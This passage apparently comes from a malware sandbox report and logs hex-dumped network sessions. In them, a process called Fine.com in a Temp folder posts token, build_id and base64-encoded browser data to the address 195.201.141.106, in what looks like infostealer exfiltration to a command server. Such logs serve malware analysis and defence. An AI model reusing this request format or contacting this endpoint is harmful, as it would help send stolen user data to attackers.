                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:02 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          15192.168.2.549995195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VSJECJEC2VAIM79HVAIW
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 142457
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 4a 45 43 32 56 41 49 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 4a 45 43 32 56 41 49 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 4a 45 43 32 56 41 49 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VSJECJEC2VAIM79HVAIWContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VSJECJEC2VAIM79HVAIWContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VSJECJEC2VAIM79HVAIWCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:03 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:04 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          16192.168.2.550004195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:04 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JWT2DT2NGVAAAIEUSR1N
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:04 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 32 44 54 32 4e 47 56 41 41 41 49 45 55 53 52 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------JWT2DT2NGVAAAIEUSR1NContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------JWT2DT2NGVAAAIEUSR1NCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:05 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          17192.168.2.550043195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC183OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IECBS26PZ58QIMOZU37Q
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 3165
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 53 32 36 50 5a 35 38 51 49 4d 4f 5a 55 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------IECBS26PZ58QIMOZU37QContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------IECBS26PZ58QIMOZU37QContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------IECBS26PZ58QIMOZU37QCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:11 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          18192.168.2.550040142.250.185.974437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC594OUTGET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFIdbgQ7ESlYbUZzB8pql3DWTFELxD2n09WtjpIezUW1CX8WPd4aC1edma-QRG2LNJXSSTIc
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 09:05:00 GMT
                                                                                                                                                                                                                                                                                                                          Expires: Mon, 12 Jan 2026 09:05:00 GMT
                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                          Age: 26290
                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                          Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:10 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                                                          Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
